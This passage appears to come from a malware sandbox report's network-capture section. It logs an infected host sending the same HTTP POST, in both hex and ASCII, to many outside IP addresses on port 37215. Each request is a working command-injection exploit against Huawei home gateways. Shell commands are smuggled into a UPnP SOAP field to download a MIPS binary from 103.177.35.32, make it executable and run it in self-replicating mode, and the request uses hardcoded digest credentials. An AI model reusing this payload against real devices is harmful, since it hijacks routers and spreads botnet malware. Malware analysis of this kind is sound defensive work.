                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        287192.168.2.2347520197.139.140.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316596031 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        288192.168.2.2357466157.144.3.21237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316606045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        289192.168.2.235642041.242.59.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316643000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        290192.168.2.2338656157.118.127.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316646099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        291192.168.2.2344670197.199.62.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316682100 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        292192.168.2.2351710197.56.154.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.316759109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        293192.168.2.236008441.208.59.13537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.318346977 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        294192.168.2.2347828180.178.53.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.318408966 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        295192.168.2.234834851.115.124.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.318671942 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        296192.168.2.2342704197.27.234.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.318960905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
